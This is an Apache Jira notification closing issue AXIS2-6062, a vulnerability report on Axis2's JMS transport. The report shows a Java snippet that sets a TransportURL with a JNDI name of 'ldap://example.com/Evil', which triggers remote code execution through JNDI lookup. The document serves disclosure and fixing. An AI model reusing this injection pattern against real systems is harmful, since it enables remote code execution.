[jira] [Closed] (AXIS2-6062) Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol in `JMSSender`?

Mon, 10 Feb 2025 15:45:22 -0800 


     [ 
https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Robert Lazarski closed AXIS2-6062.
----------------------------------
    Resolution: Fixed

> Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol 
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
>                 Key: AXIS2-6062
>                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
>             Project: Axis2
>          Issue Type: Bug
>          Components: JMS transport
>    Affects Versions: 1.8.2
>            Reporter: Letian Yuan
>            Assignee: Robert Lazarski
>            Priority: Critical
>             Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method, 
> `{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a 
> JMS message. However, if we send a JMS message like this:
>  
> {{    MessageContext context = new MessageContext();}}
> {{    context.setProperty("TransportURL", 
> "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil";);}}
> {{    JMSSender sender = new JMSSender();}}
> {{    sender.invoke(context);}}
>  
> Then, arbitrary commands from remote server "ldap://example.com/Evil"; would 
> be executed.
> We want to discuss with you about it.
> First, excecuting arbitrary commands from remote server is quite dangerous. 
> Second, as far as we know, no one would use LDAP protocol to get 
> `{{{}ConnectionFactory{}}}`.
> Third, it seem this behavior has not been documented in your “User’s Guide”, 
> so library users might not know this API of sending JMS messages can be used 
> to execute arbitrary commands. So, I think that library users are very 
> possible to misuse this API. For example, concatenating user input to the 
> parameter of `{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}` 
> available in a configuration file such as `{{{}foobar.properties{}}}`. We 
> know that such cases rarely happen and might not be your design purpose, but 
> it is possible anyway. As long as an attacker can control the parameter of 
> `{{{}invoke{}}}`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether 
> it is necessary for LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to